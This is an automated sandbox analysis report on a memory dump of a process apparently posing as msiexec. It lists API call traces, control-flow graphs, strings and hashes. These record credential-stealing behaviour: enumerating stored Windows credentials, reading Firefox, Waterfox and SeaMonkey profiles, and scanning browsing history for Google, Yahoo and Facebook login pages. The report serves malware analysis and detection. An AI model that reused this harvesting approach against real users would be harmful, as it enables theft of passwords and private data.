                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                              • String ID: bhv
                                                                                              • API String ID: 4234240956-2689659898
                                                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2941347001-70141382
                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 647 446747-44674b 644->647 648 446728-44672d 644->648 653 4467ac-4467b7 __setusermatherr 645->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->654 647->643 649 44674d-44674f 647->649 648->643 651 446734-44673b 648->651 652 446755-446758 649->652 651->643 655 44673d-446745 651->655 652->645 653->654 658 446810-446819 654->658 659 44681e-446825 654->659 655->652 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 668 446853-446864 GetStartupInfoW 663->668 669 44684d-446851 663->669 664->662 665->661 665->666 666->663 670 446840-446842 666->670 672 446866-44686a 668->672 673 446879-44687b 668->673 669->668 669->670 670->663 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 2827331108-0
                                                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                              • String ID: visited:
                                                                                              • API String ID: 1157525455-1702587658
                                                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 724 40e283-40e286 717->724 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 724->725 726 40e288-40e290 free 724->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                                                              APIs
                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                              • API String ID: 2804212203-2982631422
                                                                                              • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                              • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 115830560-3916222277
                                                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                              • API String ID: 2936932814-4196376884
                                                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 828 40bdb0-40bdce call 404363 831 40bf63-40bf6f call 40440c 828->831 832 40bdd4-40bddd 828->832 834 40bdee 832->834 835 40bddf-40bdec CredEnumerateW 832->835 836 40bdf0-40bdf2 834->836 835->836 836->831 838 40bdf8-40be18 call 40b2cc wcslen 836->838 841 40bf5d 838->841 842 40be1e-40be20 838->842 841->831 842->841 843 40be26-40be42 wcsncmp 842->843 844 40be48-40be77 call 40bd5d call 404423 843->844 845 40bf4e-40bf57 843->845 844->845 850 40be7d-40bea3 memset 844->850 845->841 845->842 851 40bea5 850->851 852 40bea7-40beea memcpy 850->852 851->852 853 40bf11-40bf2d wcschr 852->853 854 40beec-40bf06 call 40b2cc _wcsnicmp 852->854 856 40bf38-40bf48 LocalFree 853->856 857 40bf2f-40bf35 853->857 854->853 859 40bf08-40bf0e 854->859 856->845 857->856 859->853
                                                                                              APIs
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                              • String ID:
                                                                                              • API String ID: 697348961-0
                                                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                              • API String ID: 1829478387-11920434
                                                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                              • API String ID: 1829478387-2068335096
                                                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                              • memset.MSVCRT ref: 00404020
                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                              • API String ID: 1829478387-3369679110
                                                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                              • API String ID: 3510742995-2641926074
                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                              • free.MSVCRT ref: 0041848B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileLastfree
                                                                                              • String ID: |A
                                                                                              • API String ID: 981974120-1717621600
                                                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                              APIs
                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                              • String ID: $0.@
                                                                                              • API String ID: 2758756878-1896041820
                                                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
